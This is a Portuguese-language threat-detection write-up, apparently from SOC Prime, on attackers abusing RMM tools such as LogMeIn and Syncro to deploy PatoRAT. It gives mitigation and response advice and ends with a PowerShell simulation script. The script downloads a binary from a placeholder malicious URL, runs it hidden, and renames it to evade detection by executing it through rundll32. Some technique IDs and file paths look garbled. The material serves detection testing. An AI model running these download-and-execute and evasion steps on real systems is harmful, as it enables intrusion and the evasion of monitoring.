SOC Prime Bias: Crítico

28 Jan 2026 08:41 UTC

Detecção de Endpoint de Casos Recentes de Distribuição de RMM

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Detecção de Endpoint de Casos Recentes de Distribuição de RMM
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Os cibercriminosos estão cada vez mais abusando de ferramentas legítimas de Gerenciamento e Monitoramento Remoto (RMM) — como LogMeIn, PDQ Connect, Syncro, ScreenConnect, NinjaOne e SuperOps — para distribuir malware e estabelecer acesso remoto persistente. A entrega inicial geralmente ocorre por meio de páginas de download maliciosas ou e-mails de phishing, seguida pela execução do PowerShell e implantação de cargas secundárias, como o PatoRAT. AhnLab EDR pode detectar a execução dessas utilidades RMM e gerar alertas baseados em comportamento em torno de atividades suspeitas subsequentes. O relatório enfatiza a importância de validar a proveniência do software e manter a monitoração contínua dos endpoints.

Investigação

O AhnLab Security Intelligence Center observou várias campanhas nas quais os atacantes reformularam ou disfarçaram instaladores RMM como aplicativos populares (por exemplo, Notepad++, 7-Zip e Telegram) e os entregaram via sites maliciosos ou anexos de phishing. Após a instalação, os agentes RMM se registraram na infraestrutura do fornecedor e foram então usados para executar cargas de PowerShell que implantavam o PatoRAT. Técnicas similares apareceram em diversos produtos RMM, incluindo Syncro, entregue por meio de phishing com iscas de PDF. A lógica de detecção do AhnLab EDR foi desenvolvida para sinalizar a execução desses binários legítimos e correlacioná-los com comportamentos pós-instalação.

Mitigação

Verifique as fontes de download, valide os certificados de assinatura de código e compare os hashes com as versões oficiais do fornecedor antes de permitir o software RMM no ambiente. Implemente uma lista de permissões de aplicativos e exija aprovações explícitas para a execução de RMM. Monitore lançamentos inesperados de binários RMM, atividades anômalas de PowerShell e conexões suspeitas com domínios de infraestruturas de fornecedores quando tais ferramentas não forem sancionadas. Mantenha os sistemas operacionais e ferramentas de segurança atualizadas para reduzir a exposição.

Resposta

Quando uma execução suspeita de RMM for detectada, isole o host, colete artefatos forenses e remova o binário não autorizado. Bloqueie conexões de saída para a infraestrutura da ferramenta para cortar canais de controle remoto e realize uma varredura completa para cargas secundárias como o PatoRAT. Atualize o conteúdo de detecção com os IOCs observados e informe o SOC sobre os padrões da campanha para um triagem mais rápida.

Fluxo de Ataque

Execução de Simulação

Pré-requisito: O Check de Telemetria e Base Linha Pré-voo deve ter passado.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a exata telemetria esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.

  • Narrativa do Ataque & Comandos:
    Um atacante entrega um e-mail de phishing contendo um anexo malicioso. O anexo executa um script do PowerShell que baixa o binário RMM LogMeIn.exe to C:Temp. Para evadir a detecção baseada em nome, o atacante renomeia o binário para tool.exe e o lança via rundll32.exe (T1216). O binário RMM então contata o servidor C2 controlado pelo atacante e solta uma carga de backdoor. Após a execução, o atacante apaga o binário (T1542.004) para cobrir os rastros.

  • Script de Teste de Regressão:

    # ---------------------------------------------------------------
    # Simular exploração de ferramenta RMM (nome original) – deve acionar
    # ---------------------------------------------------------------
    $rmmPath = "C:TempLogMeIn.exe"
    Invoke-WebRequest -Uri "https://example.com/malicious/LogMeIn.exe" -OutFile $rmmPath
    Write-Host "[*] Executando binário RMM original (esperado alerta)..."
    Start-Process -FilePath $rmmPath -WindowStyle Hidden
    Start-Sleep -Seconds 10
    
    # ---------------------------------------------------------------
    # Simular evasão renomeando e execução por proxy – NÃO deve acionar
    # ---------------------------------------------------------------
    $evasionPath = "C:Temptool.exe"
    Rename-Item -Path $rmmPath -NewName "tool.exe"
    Write-Host "[*] Executando binário RMM renomeado via rundll32 (evasão)..."
    $rundll = "$env:SystemRootSystem32rundll32.exe"
    Start-Process -FilePath $rundll -ArgumentList "`"$evasionPath`",#1" -WindowStyle Hidden
    Start-Sleep -Seconds 10
    
    # ---------------------------------------------------------------
    # Limpeza de artefatos
    # ---------------------------------------------------------------
    Write-Host "[*] Limpando binários..."
    Remove-Item -Path $evasionPath -Force -ErrorAction SilentlyContinue
    Write-Host "[*] Simulação completa."
  • Comandos de Limpeza:

    # Assegure que quaisquer processos remanescentes sejam terminados
    Get-Process -Name "LogMeIn","tool" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Remova quaisquer arquivos baixados (se ainda existirem)
    Remove-Item -Path "C:TempLogMeIn.exe","C:Temptool.exe" -Force -ErrorAction SilentlyContinue